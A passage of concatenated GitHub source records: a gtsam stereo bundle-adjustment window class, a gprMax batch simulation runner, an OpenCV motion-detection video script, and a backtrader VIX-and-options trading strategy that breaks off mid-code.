utills\n\nLAND_MARK_SYM = \"q\"\nCAMERA_SYM = \"c\"\nP3D_MAX_DIST = 80\n\n\nclass BundleWindow:\n\n BUNDLE_WINDOW_LST = []\n\n def __init__(self, first_key_frame, second_key_frame, frames_in_window): # Todo: add Rotation\n self.__first_key_frame = first_key_frame\n self.__second_key_frame = second_key_frame\n self.__bundle_len = 1 + second_key_frame - first_key_frame\n self.__frames_in_window = frames_in_window\n self.__computed_tracks = set()\n\n self.__optimizer = None\n self.__initial_estimate = gtsam.Values()\n self.__optimized_values = None\n self.__camera_sym = set() # {CAMERA_SYM + frame index : gtsam symbol} for example {\"q1\": symbol(q1, place)}\n self.__landmark_sym = set()\n\n self.__graph = gtsam.NonlinearFactorGraph()\n\n def create_factor_graph(self):\n #Todo: 1. Consider change this such that it will get the all tracks in the frame in the bundle and run all over them\n # instead of receive a track from each frame\n # 2. Check the change of getting the relative trans array instead of the relatiive to first\n gtsam_calib_mat = utills.create_gtsam_calib_cam_mat(utills.K)\n\n first_frame = self.__frames_in_window[0]\n\n # Compute first frame extrinsic matrix that takes a point at the camera coordinates and map it to\n # the world coordinates where \"world\" here means frame 0 of the whole movie coordinates\n first_frame_cam_to_world_ex_mat = utills.convert_ex_cam_to_cam_to_world(first_frame.get_ex_cam_mat()) # first cam -> world\n\n # For each frame - create initial estimation for it's pose\n cur_cam_pose = None\n for i, frame in enumerate(self.__frames_in_window):\n\n # Create camera symbol and update values dictionary\n left_pose_sym = symbol(CAMERA_SYM, frame.get_id())\n self.__camera_sym.add(left_pose_sym)\n\n # Initialize constraints for first pose\n if i == 0:\n # sigmas array: first 3 for angles second 3 for location\n # sigmas = np.array([10 ** -3, 10 ** -3, 10 ** -3, 10 ** -2, 10 ** -2, 10 ** -2])\n sigmas = np.array([(3 * np.pi / 180)**2] * 3 + [1.0, 0.3, 1.0])\n pose_uncertainty = gtsam.noiseModel.Diagonal.Sigmas(sigmas=sigmas) # todo: check choice of diagonal\n # Initial pose\n factor = gtsam.PriorFactorPose3(left_pose_sym, gtsam.Pose3(), pose_uncertainty)\n self.__graph.add(factor)\n\n # Compute transformation of : (world - > cur cam) * (first cam -> world) = first cam -> cur cam\n camera_relate_to_first_frame_trans = utills.compose_transformations(first_frame_cam_to_world_ex_mat, frame.get_ex_cam_mat())\n\n # Convert this transformation to: cur cam -> first cam\n cur_cam_pose = utills.convert_ex_cam_to_cam_to_world(camera_relate_to_first_frame_trans)\n self.__initial_estimate.insert(left_pose_sym, gtsam.Pose3(cur_cam_pose))\n\n gtsam_left_cam_pose = gtsam.Pose3(cur_cam_pose)\n\n # For each track create measurements factors\n tracks_in_frame = Data.DB.get_tracks_at_frame(first_frame.get_id())\n\n for track in tracks_in_frame:\n # Check that this track has bot been computed yet and that it's length is satisfied\n if track.get_id() in self.__computed_tracks or track.get_last_frame_ind() < self.__second_key_frame:\n continue\n\n # Create a gtsam object for the last frame for making the projection at the function \"add_factors\"\n gtsam_last_cam = gtsam.StereoCamera(gtsam_left_cam_pose, gtsam_calib_mat)\n self.add_factors(track, self.__first_key_frame, self.__second_key_frame, gtsam_last_cam, gtsam_calib_mat) # Todo: as before\n\n self.__computed_tracks.add(track.get_id())\n\n\n # def create_factor_graph(self):\n # # Todo: 1. Check this with rel trans\n # # instead of receive a track from each frame\n # # 2. Check the change of getting the relative trans array instead of the relatiive to first\n # gtsam_calib_mat = utills.create_gtsam_calib_cam_mat(utills.K)\n #\n # first_frame = self.__frames_in_window[0]\n #\n # # Compute first frame extrinsic matrix that takes a point at the camera coordinates and map it to\n # # the world coordinates where \"world\" here means frame 0 of the whole movie coordinates\n # rel_trans = Data.DB.get_relative_cam_trans()[self.__first_key_frame: self.__second_key_frame + 1]\n # cams_rel_to_bundle_first_cam = utills.convert_trans_from_rel_to_global(rel_trans)\n #\n # # For each frame - create initial estimation for it's pose\n # cur_cam_pose = None\n # for i, frame in enumerate(self.__frames_in_window):\n #\n # # Create camera symbol and update values dictionary\n # left_pose_sym = symbol(CAMERA_SYM, frame.get_id())\n # self.__camera_sym.add(left_pose_sym)\n #\n # # Initialize constraints for first pose\n # if i == 0:\n # # sigmas array: first 3 for angles second 3 for location\n # # sigmas = np.array([10 ** -3, 10 ** -3, 10 ** -3, 10 ** -2, 10 ** -2, 10 ** -2])\n # sigmas = np.array([(3 * np.pi / 180) ** 2] * 3 + [1.0, 0.3, 1.0])\n # pose_uncertainty = gtsam.noiseModel.Diagonal.Sigmas(sigmas=sigmas) # todo: check choice of diagonal\n # # Initial pose\n # factor = gtsam.PriorFactorPose3(left_pose_sym, gtsam.Pose3(), pose_uncertainty)\n # self.__graph.add(factor)\n #\n # # Convert this transformation to: cur cam -> first cam\n # cur_cam_pose = utills.convert_ex_cam_to_cam_to_world(cams_rel_to_bundle_first_cam[i])\n # self.__initial_estimate.insert(left_pose_sym, gtsam.Pose3(cur_cam_pose))\n #\n # gtsam_left_cam_pose = gtsam.Pose3(cur_cam_pose)\n #\n # # For each track create measurements factors\n # tracks_in_frame = Data.DB.get_tracks_at_frame(first_frame.get_id())\n #\n # for track in tracks_in_frame:\n # # Check that this track has bot been computed yet and that it's length is satisfied\n # if track.get_id() in self.__computed_tracks or track.get_last_frame_ind() < self.__second_key_frame:\n # continue\n #\n # # Create a gtsam object for the last frame for making the projection at the function \"add_factors\"\n # gtsam_last_cam = gtsam.StereoCamera(gtsam_left_cam_pose, gtsam_calib_mat)\n # self.add_factors(track, self.__first_key_frame, self.__second_key_frame, gtsam_last_cam,\n # gtsam_calib_mat) # Todo: as before\n #\n # self.__computed_tracks.add(track.get_id())\n\n\n def add_factors(self, track, first_frame_ind, last_frame_ind, gtsam_frame_to_triangulate_from, gtsam_calib_mat, frame_idx_triangulate=-1):\n \"\"\"\n At this mission we:\n 1. Randomize a track with len of track_len\n 2. Triangulate a point from the \"frame_idx_triangulate\" frame in the track\n 3. Projects it to all frames_in_window in the track\n 4. Computes their re projection error on each frame\n 5. Finally, plot the results\n \"\"\"\n\n frames_in_track = Data.DB.get_frames()[first_frame_ind: last_frame_ind + 1]\n\n # Track's locations in frames_in_window\n left_locations = track.get_left_locations_in_specific_frames(first_frame_ind, last_frame_ind)\n right_locations = track.get_right_locations_in_specific_frames(first_frame_ind, last_frame_ind)\n\n # Track's location at the Last frame for triangulations\n last_left_img_loc = left_locations[frame_idx_triangulate]\n last_right_img_loc = right_locations[frame_idx_triangulate]\n\n # Create Measures of last frame for the triangulation\n measure_xl, measure_xr, measure_y = last_left_img_loc[0], last_right_img_loc[0], last_left_img_loc[1]\n gtsam_stereo_point2_for_triangulation = gtsam.StereoPoint2(measure_xl, measure_xr, measure_y)\n\n # Triangulation from last frame\n gtsam_p3d = gtsam_frame_to_triangulate_from.backproject(gtsam_stereo_point2_for_triangulation)\n\n # Ignore tracks that their 3d point is far Todo: Maybe to add it with more than 100 - last check wasnt good\n # if utils.euclidean_dist_3d(gtsam_p3d, gtsam_frame_to_triangulate_from.pose().translation()) >= 100:\n # return\n\n # Add landmark symbol to \"values\" dictionary\n p3d_sym = symbol(LAND_MARK_SYM, track.get_id())\n self.__landmark_sym.add(p3d_sym)\n self.__initial_estimate.insert(p3d_sym, gtsam_p3d)\n\n for i, frame in enumerate(frames_in_track):\n\n # Measurement values\n measure_xl, measure_xr, measure_y = left_locations[i][0], right_locations[i][0], left_locations[i][1]\n gtsam_measurement_pt2 = gtsam.StereoPoint2(measure_xl, measure_xr, measure_y)\n\n # Factor creation\n projection_uncertainty = gtsam.noiseModel.Isotropic.Sigma(3, 1.0)\n factor = gtsam.GenericStereoFactor3D(gtsam_measurement_pt2, projection_uncertainty,\n symbol(CAMERA_SYM, frame.get_id()), p3d_sym, gtsam_calib_mat)\n\n # Add factor to the graph\n self.__graph.add(factor)\n\n def optimize(self):\n self.__optimizer = gtsam.LevenbergMarquardtOptimizer(self.__graph, self.__initial_estimate)\n self.__optimized_values = self.__optimizer.optimize()\n\n def update_optimization(self, values):\n self.__initial_estimate = values\n\n def graph_error(self, optimized=True):\n if not optimized:\n error = self.__graph.error(self.__initial_estimate)\n else:\n error = self.__graph.error(self.__optimized_values)\n\n return np.log(error) # Todo: here we returns the reprojection error probably\n\n def get_initial_estimate_values(self):\n return self.__initial_estimate\n\n def get_optimized_values(self):\n return self.__optimized_values\n\n def get_cameras_symbols_lst(self):\n return self.__camera_sym\n\n def get_landmarks_symbols_lst(self):\n return self.__landmark_sym\n\n def get_optimized_cameras_poses(self):\n cameras_poses = []\n for camera_sym in self.__camera_sym:\n cam_pose = self.__optimized_values.atPose3(camera_sym)\n cameras_poses.append(cam_pose)\n\n return cameras_poses\n\n def get_optimized_cameras_p3d_version2(self):\n cameras_poses = []\n for camera_sym in self.__camera_sym:\n cam_pose = self.__optimized_values.atPose3(camera_sym)\n cameras_poses.append([cam_pose.x(), cam_pose.y(), cam_pose.z()])\n\n return cameras_poses\n\n def get_optimized_cameras_p3d(self):\n cam_pose = self.__optimized_values.atPose3(symbol(CAMERA_SYM, self.__second_key_frame))\n return cam_pose\n\n def get_optimized_landmarks_p3d(self):\n landmarks = []\n for landmark_sym in self.__landmark_sym:\n landmark = self.__optimized_values.atPoint3(landmark_sym)\n landmarks.append(landmark)\n\n return landmarks\n\n def get_initial_estimate_cameras_p3dversion2(self):\n cameras_poses = []\n for camera_sym in self.__camera_sym:\n cam_pose = self.__initial_estimate.atPose3(camera_sym)\n cameras_poses.append([cam_pose.x(), cam_pose.y(), cam_pose.z()])\n\n return cameras_poses\n\n def get_initial_estimate_cameras_p3d(self):\n cam_pose = self.__initial_estimate.atPose3(symbol(CAMERA_SYM, self.__second_key_frame)).inverse()\n return cam_pose\n\n def get_initial_estimate_landmarks_p3d(self):\n landmarks = []\n for landmark_sym in self.__landmark_sym:\n landmark = self.__initial_estimate.atPoint3(landmark_sym)\n landmarks.append(landmark)\n\n return landmarks\n\n def get_key_frames(self):\n return self.__first_key_frame, self.__second_key_frame\n\n # Todo: Left for further checking\n\n # def create_factor_graph_all_tracks(self):\n # gtsam_calib_mat = ex5.create_gtsam_calib_cam_mat(utils.K)\n # # # Create gtsam objects for each frame\n #\n # first_frame = self.__frames_in_window[0]\n # # first_frame_global_cam_to_world_trans = gtsam.Pose3(first_frame.get_ex_cam_mat()).inverse() # Trans from camera to world\n #\n # first_frame_cam_to_world_ex_mat = ex5.convert_ex_cam_to_cam_to_world(first_frame.get_ex_cam_mat()) # first cam -> world\n #\n # cur_cam_pose = None\n # # Add projections factors for each frame - \"camera\"\n # for i, frame in enumerate(self.__frames_in_window):\n #\n # # Create camera symbol and update values dictionary\n # left_pose_sym = symbol(CAMERA_SYM, frame.get_id())\n # self.__camera_sym.add(left_pose_sym)\n #\n # # Initialize constraints for first pose\n # if i == 0:\n # # sigmas array: first 3 for location second 3 for angles\n # pose_uncertainty = gtsam.noiseModel.Diagonal.Sigmas(sigmas=np.array(\n # [10 ** -3, 10 ** -3, 10 ** -3, 10 ** -2, 10 ** -2, 10 ** -2])) # todo: check choice of diagonal\n # # Initial pose\n # factor = gtsam.PriorFactorPose3(left_pose_sym, gtsam.Pose3(), pose_uncertainty)\n # self.__graph.add(factor)\n #\n # # camera_relate_to_first_frame_trans = first_frame_global_cam_to_world_trans.between(gtsam.Pose3(frame.get_ex_cam_mat()).inverse())\n #\n # # Compute transformation of : (world - > cur cam) * (first cam -> world) = first cam -> cur cam\n # camera_relate_to_first_frame_trans = utils.compose_transformations(first_frame_cam_to_world_ex_mat, frame.get_ex_cam_mat())\n #\n # cur_cam_pose = ex5.convert_ex_cam_to_cam_to_world(camera_relate_to_first_frame_trans) # cur cam -> first cam\n # self.__initial_estimate.insert(left_pose_sym, gtsam.Pose3(cur_cam_pose))\n #\n # gtsam_left_cam_pose = gtsam.Pose3(cur_cam_pose)\n # # For each track create measurements factors\n #\n # for i, frame in enumerate(self.__frames_in_window):\n #\n # tracks_in_frame = self.db.get_tracks_at_frame(frame.get_id())\n #\n # for track in tracks_in_frame:\n # if track.get_id() in self.__computed_tracks or track.get_last_frame_ind() < self.__second_key_frame + i:\n # continue\n #\n # gtsam_last_cam = gtsam.StereoCamera(gtsam_left_cam_pose, gtsam_calib_mat)\n # self.add_factors(track, frame.get_id(), self.__second_key_frame, gtsam_last_cam, gtsam_calib_mat) # Todo: as before\n #\n # self.__computed_tracks.add(track.get_id())\n","repo_name":"maoratar1/VAN_ex_old","sub_path":"BundleAdjustmentDirectory/BundleWindow.py","file_name":"BundleWindow.py","file_ext":"py","file_size_in_byte":15034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31463437358","text":"import time\r\nimport datetime\r\nimport logging\r\nfrom pathlib import Path\r\n\r\nimport gprMax\r\nfrom gprMax.exceptions import GeneralError\r\n\r\n\r\ndef setup_logger(filename_base: str, timestamp: str) -> logging.Logger:\r\n \"\"\"Sets up a `Logger` object for diagnostic and debug\r\n\r\n A standard function to set up and configure a Python `Logger` object\r\n for recording diagnostic and debug data.\r\n\r\n Args:\r\n filename_base: A `str` containing a user-supplied filename to better\r\n identify the logs.\r\n timestamp: A `str` with the date and time the logger was started\r\n to differentiate between different runs\r\n\r\n Returns:\r\n A `Logger` object with appropriate configurations. All the messages\r\n are duplicated to the command prompt as well.\r\n\r\n Raises:\r\n Nothing\r\n \"\"\"\r\n log_filename = \"_\".join([timestamp, filename_base])\r\n log_filename = \".\".join([log_filename, \"log\"])\r\n\r\n logger = logging.getLogger(filename_base)\r\n\r\n logger_handler = logging.FileHandler(log_filename)\r\n logger_handler.setLevel(logging.DEBUG)\r\n\r\n fmt_string = \"{asctime:s} {msecs:.3f} \\t {levelname:^10s} \\t {message:s}\"\r\n datefmt_string = \"%Y-%m-%d %H:%M:%S\"\r\n logger_formatter = logging.Formatter(\r\n fmt=fmt_string, datefmt=datefmt_string, style=\"{\"\r\n )\r\n\r\n # * This is to ensure consistent formatting of the miliseconds field\r\n logger_formatter.converter = time.gmtime\r\n\r\n logger_handler.setFormatter(logger_formatter)\r\n logger.addHandler(logger_handler)\r\n\r\n # * This enables the streaming of messages to stdout\r\n logging.basicConfig(\r\n format=fmt_string,\r\n datefmt=datefmt_string,\r\n style=\"{\",\r\n level=logging.DEBUG,\r\n )\r\n logger.info(\"Logger configuration done\")\r\n\r\n return logger\r\n\r\n\r\nglobal_timestamp = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S\")\r\ngprmax_logger = setup_logger(\"gprMax_scenario_runner\", global_timestamp)\r\ngprmax_logger.info(\"Starting gprMax simulations\")\r\n\r\n# ! Modify this if individual simulation files are elsewhere\r\nscenarios_folder = Path.cwd() / 'scenarios_empty'\r\n\r\ngprmax_logger.info(\"Processing %s\", scenarios_folder)\r\n\r\nscenarios_files = list(scenarios_folder.glob(\"*.py\"))\r\n\r\ngprmax_logger.info(\"Found %d files\", len(scenarios_files))\r\n\r\nfor scenario_file in scenarios_files:\r\n try:\r\n gprmax_logger.info(\"Running %s\", scenario_file)\r\n gprMax.gprMax.api(str(scenario_file), write_processed=True)\r\n except GeneralError as e:\r\n gprmax_logger.exception(\"gprMax error during simulation\")\r\n else:\r\n gprmax_logger.info(\"Simulation completed successfully\")\r\n\r\ngprmax_logger.info(\"All files processed\")\r\n\r\nlogging.shutdown()\r\n","repo_name":"pipebots/t6_gprMax_simulations","sub_path":"run_scenarios.py","file_name":"run_scenarios.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45639928524","text":"import cv2\nfrom aug_algorithms import brightness\n\n\ndef get_brightness(image_frame):\n hue_saturation_value = cv2.cvtColor(image_frame, cv2.COLOR_BGR2HSV)\n _, _, value = cv2.split(hue_saturation_value)\n return value\n\n\n# cap = cv2.VideoCapture('input_video.mp4')\ncap = cv2.VideoCapture(0)\nret, frame = cap.read()\nsize = (frame.shape[1], frame.shape[0])\n\naction_video = cv2.VideoWriter(filename='frames_without_actions.mp4', fourcc=cv2.VideoWriter_fourcc(*'MP4V'),\n fps=20, frameSize=size)\ncroses_video = cv2.VideoWriter(filename='input_video_with_red_cross.mp4', fourcc=cv2.VideoWriter_fourcc(*'MP4V'),\n fps=20, frameSize=size)\n\nprevious_frame = frame\naction_video.write(frame)\ncroses_video.write(frame)\nprevious_frame_birghtness = get_brightness(frame)\nflag = 0\nwhile True:\n ret, current_frame = cap.read()\n current_brightness = get_brightness(current_frame)\n delta_brightness = cv2.absdiff(current_brightness, previous_frame_birghtness)\n\n # try to reduce the brightness\n previous_frame_bright = brightness(previous_frame, param=15)\n current_frame_bright = brightness(current_frame, param=15)\n\n # convert to grey scale\n previous_gray = cv2.cvtColor(previous_frame_bright, cv2.COLOR_BGR2GRAY)\n current_gray = cv2.cvtColor(current_frame_bright, cv2.COLOR_BGR2GRAY)\n\n # try blurring the frames\n previous_gray_blur = cv2.GaussianBlur(src=previous_gray, ksize=(21, 21), sigmaX=0)\n current_gray_blur = cv2.GaussianBlur(src=current_gray, ksize=(21, 21), sigmaX=0)\n\n # calculating difference between the 2 frames\n diff = cv2.absdiff(previous_gray_blur, current_gray_blur)\n\n # thresholding\n _, diff_blur_thresh = cv2.threshold(src=diff, thresh=20, maxval=255, type=cv2.THRESH_BINARY)\n diff_blur_thresh = cv2.dilate(src=diff_blur_thresh, kernel=None, iterations=2)\n\n # find contours\n counts, _ = cv2.findContours(image=diff_blur_thresh.copy(), mode=cv2.RETR_EXTERNAL, method=cv2.CHAIN_APPROX_SIMPLE)\n\n # find max area of the contours\n max_area_size = -1\n for c in counts:\n M = cv2.moments(c)\n area = M['m00']\n if area > max_area_size:\n max_area_size = area\n\n display_frame = current_frame.copy()\n # print(max_area_size, len(counts))\n # check if there is movement or not based on the threshold: 10 - 314000\n if max_area_size < 10 or max_area_size > 314000:\n cv2.line(img=display_frame, pt1=(0, 0), pt2=(current_frame.shape[1] - 1, current_frame.shape[0] - 1),\n color=(0, 0, 255), thickness=5, lineType=cv2.LINE_4)\n cv2.line(img=display_frame, pt1=(current_frame.shape[1] - 1, 0), pt2=(0, current_frame.shape[0] - 1),\n color=(0, 0, 255), thickness=5, lineType=cv2.LINE_4)\n if flag != 0:\n print(flag)\n flag = 0\n else:\n action_video.write(current_frame)\n flag += 1\n\n cv2.imshow('current_frame', display_frame)\n # check is end of video than break\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n croses_video.write(display_frame)\n\n previous_frame = current_frame\n previous_birghtness = current_brightness\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"dluca14/Master_ML","sub_path":"FCV/Proiect2_FCV/video_script.py","file_name":"video_script.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16563247686","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 13 10:45:56 2019\r\n\r\n@author: DELL\r\n\"\"\"\r\n\r\nfrom __future__ import (absolute_import, division, print_function,\r\n unicode_literals)\r\nimport backtrader as bt\r\nimport pyfolio as pf\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport optimizer\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n#%matplotlib inline\r\n\r\n\r\n\r\n\r\n#Create a Strategy #\r\nclass TestStrategy(bt.Strategy):\r\n\r\n params = (('vix_lowBound',30),\\\r\n ('vix_upBound',20),\\\r\n ('vixRatio10_buy',0.2),\\\r\n ('vixRatio10_sell',0.4),\\\r\n ('smaRatio_sell',1.015),\\\r\n ('stop_loss',0.1),\\\r\n ('trail',0.1)\r\n )\r\n\r\n def log(self, txt, dt=None,doprint=False):\r\n ''' Logging function fot this strategy'''\r\n if opt2 or doprint:\r\n dt = dt or self.datas[0].datetime.date(0)\r\n print('%s, %s' % (dt.isoformat(), txt))\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.broker.set_coc(True)\r\n\r\n self.dataclose={}\r\n self.dataopen={}\r\n self.datalow={}\r\n self.datahigh={}\r\n self.volume={}\r\n self.order={}\r\n self.trade_sig={}\r\n self.signal1={}\r\n self.signal2={} \r\n self.signal3={} \r\n self.close_sig={}\r\n self.w_portfolio=w_portfolio\r\n self.w_close=[0]*num\r\n self.option_ratio=option_ratio[opt]\r\n self.sma5 = bt.indicators.SMA(self.data, period=5)\r\n self.sma10 = bt.indicators.SMA(self.data, period=10) \r\n self.sma20 = bt.indicators.SMA(self.data, period=20)\r\n self.sma30 = bt.indicators.SMA(self.data, period=30)\r\n self.sma60 = bt.indicators.SMA(self.data, period=60) \r\n vix=Vix()\r\n vixRatio10=VixRatio10() \r\n crossOver=bt.Or(bt.And(self.sma5/self.sma10<1,self.sma20/self.sma60<1,\\\r\n vixRatio10<=vixRatio10_buy[opt]),\\\r\n bt.And(self.sma5/self.sma10<1,self.sma20/self.sma60<1,\\\r\n vix<=self.p.vix_upBound))\r\n \r\n crossDown=bt.Or(vixRatio10>=self.p.vixRatio10_sell,\\\r\n self.sma5/self.sma10>self.p.smaRatio_sell)\r\n\r\n if opt6:\r\n percent=Percentile() \r\n cover_call=percent<=0.2\r\n protect_put=percent>=0.8\r\n collar=bt.And(percent<0.8,percent>0.2)\r\n\r\n # Keep a reference to the \"close\" line in the data dataseries\r\n for i,data in enumerate(self.datas):\r\n self.dataclose[i] = self.datas[i].close\r\n self.dataopen[i]=self.datas[i].open\r\n self.datalow[i]=self.datas[i].low\r\n self.datahigh[i]=self.datas[i].high\r\n self.volume[i]=abs(self.datas[i].volume)\r\n \r\n # To keep track of pending orders and buy price/commission\r\n self.order[i] = None\r\n self.buyprice = None\r\n self.buycomm = None\r\n self.bar_executed=None\r\n self.trade_sig[i]=crossOver \r\n self.close_sig[i]=crossDown\r\n \r\n if opt6:\r\n self.signal1[i]=cover_call\r\n self.signal2[i]=protect_put\r\n self.signal3[i]=collar \r\n\r\n def notify_order(self, order):\r\n if order.status in [order.Submitted, order.Accepted]:\r\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\r\n return\r\n\r\n # Check if an order has been completed\r\n # Attention: broker could reject order if not enough cash\r\n if order.status in [order.Completed]:\r\n if order.isbuy():\r\n self.log(\r\n 'BUY EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %\r\n (order.executed.price,\r\n order.executed.value,\r\n order.executed.comm))\r\n\r\n self.buyprice = order.executed.price\r\n self.buycomm= order.executed.comm\r\n else: # Sell\r\n self.log('SELL EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %\r\n (order.executed.price,\r\n order.executed.value,\r\n order.executed.comm))\r\n\r\n self.bar_executed = len(self)\r\n \r\n elif order.status in [order.Canceled, order.Margin, order.Rejected]:\r\n self.log('Order Canceled/Margin/Rejected')\r\n\r\n## stop loss for each asset\r\n# if not self.getposition: # we left the market\r\n\r\n# return\r\n \r\n# if not self.p.trail:\r\n\r\n# stop_price = order.executed.price * (1.0 - self.p.stop_loss)\r\n# self.close(exectype=bt.Order.Stop, price=stop_price)\r\n \r\n# else:\r\n# self.close(exectype=bt.Order.StopTrail, trailamount=self.p.trail) \r\n \r\n for i,data in enumerate(self.datas):\r\n self.order[i] = None\r\n\r\n def notify_trade(self, trade):\r\n if not trade.isclosed:\r\n return\r\n\r\n self.log('OPERATION PROFIT, GROSS %.2f, NET %.2f' %\r\n (trade.pnl, trade.pnlcomm))\r\n\r\n def next(self):\r\n \r\n # Simply log the closing price of the series from the reference\r\n# self.log('Close, %.2f' % self.dataclose[0])\r\n for i, data in enumerate(self.datas):\r\n data_name = data._name\r\n pos = self.getposition(data).size\r\n self.log('{} Position {}'.format(data_name, pos))\r\n\r\n # Check if an order is pending ... if yes, we cannot send a 2nd one\r\n if self.order[i]:\r\n return\r\n \r\n \r\n else:\r\n if rebalance==\"no rebalance\":\r\n if not self.getposition(data):\r\n self.order[i]=self.order_target_percent(data=self.datas[i],\\\r\n target=self.w_portfolio[i]) \r\n \r\n \r\n elif rebalance==\"rebalance\":\r\n \r\n if opt6:\r\n\r\n if not self.getposition(data) and self.trade_sig[i]:\r\n \r\n if i=num-2 and self.getposition(self.datas[i]): \r\n \r\n if self.data.datetime.date().weekday() == 2 and \\\r\n str(self.data.datetime.date())[8:]>='25':\r\n \r\n self.order[i]=self.order_target_size(data=self.datas[i],\\\r\n target=self.w_close[i])\r\n \r\n \r\n if i>=num-2 and not self.getposition(self.datas[num-1]) and\\\r\n not self.getposition(self.datas[num-2]) and self.getposition(self.datas[0]):\r\n \r\n if self.signal1[i]:\r\n \r\n size=[0]*(num-2)+[int(self.volume[num-2]*self.option_ratio),0]\r\n self.order[i]=self.order_target_size(data=self.datas[i],\\\r\n target=size[i])\r\n \r\n \r\n elif self.signal2[i]:\r\n \r\n size=[0]*(num-2)+[0,int(self.volume[num-1]*self.option_ratio)]\r\n self.order[i]=self.order_target_size(data=self.datas[i],\\\r\n target=size[i]) \r\n \r\n else:\r\n \r\n size=[0]*(num-2)+[int(self.volume[num-2]*self.option_ratio),int(self.volume[num-1]*0.1)]\r\n self.order[i]=self.order_target_size(data=self.datas[i],\\\r\n target=size[i])\r\n else:\r\n\r\n if not self.getposition(data) and self.trade_sig[i]:\r\n \r\n self.order[i]=self.order_target_percent(data=self.datas[i],\\\r\n target=self.w_portfolio[i]) \r\n \r\n if self.getposition(data) and self.close_sig[i]:\r\n self.order[i]=self.close(data=self.datas[i])\r\n \r\n\r\n\r\n# last day close position \r\n if len(self.datas[i]) == self.datas[i].buflen()-1:\r\n self.order[i]=self.close(data=self.datas[i])\r\n \r\n \r\n\r\n \r\n def stop(self): \r\n self.log('(vixRatio_sell %.2f) Ending Value %.2f'%\\\r\n (self.params.vixRatio10_sell,\\\r\n self.broker.getvalue()),doprint=True)\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n '''Option setting'''\r\n opt=1# CN=0,US=1\r\n opt2=1# optimization=0,backtest=1\r\n opt3=1# portfolio with index=0,portfolio with stock=1\r\n opt4=1#no rebalance=0,rebalance=1\r\n opt5=0# inverse ETF weight option: 0.1,0.2,0.3,0.4,0.5\r\n opt6=1#no option=0,with option=1\r\n \r\n read_path='data/'\r\n save_path='parameter result'\r\n name=['data_CN','data_US']\r\n name2=['stock_CN','stock_US'] \r\n name8=['data_optCN','data_optUS']\r\n\r\n indexName_CN=['SSE50','SSE50 Short']\r\n stockName_CN=['中国平安','贵州茅台','招商银行','伊利股份',\\\r\n '恒瑞医药','保利地产','中信证券','海螺水泥','三一重工','上汽集团']\r\n indexName_US=['SPY500','SPY500 Short']\r\n stockName_US=['MicroSoft','Apple','Berkshire Hathaway','JP Morgan',\\\r\n 'Johnson','Exxon Mobil','AT&T','Procter & Gamble',\\\r\n 'Disney','Coca Cola']\r\n \r\n optionName_CN=['SSE50 call','SSE50 put']\r\n optionName_US=['S&P500 call','S&P500 put']\r\n \r\n name3=[indexName_CN,indexName_US]\r\n name4=[stockName_CN,stockName_US]\r\n name5=[name3,name4]\r\n name9=[optionName_CN,optionName_US]\r\n\r\n name6=['data_IVIX','data_VIX']\r\n name7=['percentile_CN','percentile_US']\r\n\r\n index=pd.read_excel(read_path+name[opt]+'.xlsx')['close']\r\n vix=pd.read_excel(read_path+name6[opt]+'.xlsx')['close']\r\n percent=pd.read_excel(read_path+name7[opt]+'.xlsx')['percentage']\r\n \r\n startDate=['2015-03-01','2016-05-01']#for CN and US\r\n \r\n result_name=[\"performance_CN.csv\",\"performance_US.csv\"]\r\n \r\n \r\n commission_ratio=0.0003\r\n cash_ratio=0.005## for commission and option payment\r\n cash=500000\r\n count=0##stock count\r\n optimize_count=0## optimization count\r\n days=252#trading day\r\n mday=22#trading day a month\r\n num_list=[4,13]##asset number list\r\n num=num_list[opt3]##asset number: 2 for portfolio with index,11 for portfolio with stock\r\n risk_averse=2#risk preference\r\n vixRatio10_buy=[-0.2,0.2]\r\n option_ratio=[0.05,0.05]\r\n \r\n\r\n situations=[\"optimization\",\"backtest\"]\r\n rebalance_list=[\"no rebalance\",\"rebalance\"]\r\n situation=situations[opt2]\r\n rebalance=rebalance_list[opt4]\r\n performance=pd.DataFrame(columns=[\"n\",\"Profit\",\"Sharpe Ratio\",\\\r\n \"Max Drawdown\",\"Trade Num\"])\r\n stock=pd.read_excel(read_path+name2[opt]+'.xlsx')\r\n stock=stock.iloc[:,range(3,len(stock.columns),5)]\r\n stock.columns=name4[opt]\r\n histRtn=np.log(stock/stock.shift(1))\r\n histRtn=histRtn.fillna(0)\r\n annRtn=histRtn.mean()*days\r\n cov=histRtn.cov()*days\r\n \r\n optimizer_stock=optimizer.optimizer()\r\n w=optimizer_stock.optimize(annRtn,risk_averse,cov)\r\n w_asset=[0.1,0.2,0.3,0.4,0.5]\r\n w_stock=[w_asset[opt5]*(1-cash_ratio)]+((1-w_asset[opt5])*w*(1-cash_ratio)).tolist()\r\n w_index=[w_asset[opt5]*(1-cash_ratio),(1-w_asset[opt5])*(1-cash_ratio)]\r\n w_list=[w_index,w_stock]\r\n w_portfolio=w_list[opt3]\r\n \r\n \r\n\r\n class Vix(bt.Indicator):\r\n \r\n lines=('vix',)\r\n \r\n def next(self):\r\n self.lines.vix[0]=vix[0]\r\n \r\n def once(self, start, end):\r\n vix_array = self.lines.vix.array\r\n \r\n for i in range(start, end):\r\n vix_array[i] = vix[i]\r\n \r\n class VixRatio10(bt.Indicator):\r\n \r\n lines=('vixRatio10',)\r\n \r\n def next(self):\r\n self.lines.vixRatio10[0]=0\r\n \r\n def once(self, start, end):\r\n vixRatio10_array = self.lines.vixRatio10.array\r\n \r\n for i in range(start, end):\r\n vixRatio10_array[i] = 